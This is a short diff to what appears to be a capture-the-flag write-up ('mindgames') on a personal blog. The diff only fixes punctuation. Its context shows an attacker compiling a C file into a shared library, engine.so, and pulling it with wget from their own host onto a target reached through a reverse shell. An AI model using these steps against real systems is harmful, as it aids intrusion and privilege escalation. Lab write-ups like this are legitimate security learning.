0xTaylur/0xtaylur.github.io/mindgames.md

 }
 ```

-After we have made this C file, we must compile it using this command.
+After we have made this C file, we must compile it using this command:
 ```markdown
 gcc -fPIC -o a.o -c engine.c && gcc -shared -o engine.so -Lcrypto a.o
 ```

-Once compiled set up another SimpleHTTPServer and grab the engine.so file from your host machine onto the reverse shell.
+Once compiled, set up another SimpleHTTPServer and grab the engine.so file from your host machine onto the reverse shell.
 ```markdown
 $ wget YOUR_IP:8000/engine.so
 --2020-06-17 15:55:53--  http://YOUR_IP:8000/engine.so